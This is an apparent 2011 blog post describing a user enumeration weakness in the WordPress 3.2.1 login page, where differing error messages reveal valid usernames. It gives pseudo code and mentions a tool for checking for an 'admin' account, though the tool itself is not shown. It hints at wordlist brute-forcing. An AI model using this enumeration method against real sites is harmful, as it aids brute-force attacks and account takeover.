Tuesday 27 September 2011

WordPress 3.2.1 user enumeration vulnerability

Like we all know, not only banks have an user enumeration vulnerabilities in their webapplications :)
Almost all the time „user enumeration” is possible, be cause of bad informing about ‘wrong credentials’ in login process.
So, lets see how it lookgs in new WordPress (3.2.1).

(In pseudo code):

if user_ok --> echo 'user ok'
else if user_bad --> echo 'username invalid'
...
So thats the simple way to enumerate users (bruteforce as welcome) ;)
Here I wrote a simple tool, to check if there is an admin account:



Like You see, this simple tool can enumerate only ‘admin’. So the idea is simple. Check if there is a name(wordlist?;) ), and if it is – analyse/log the answer.

Regards! 



*Update 12.03.2012*
If You want more information about vulnerabilities in latest WordPress,
try here ;)

No comments:

Post a Comment

What do You think...?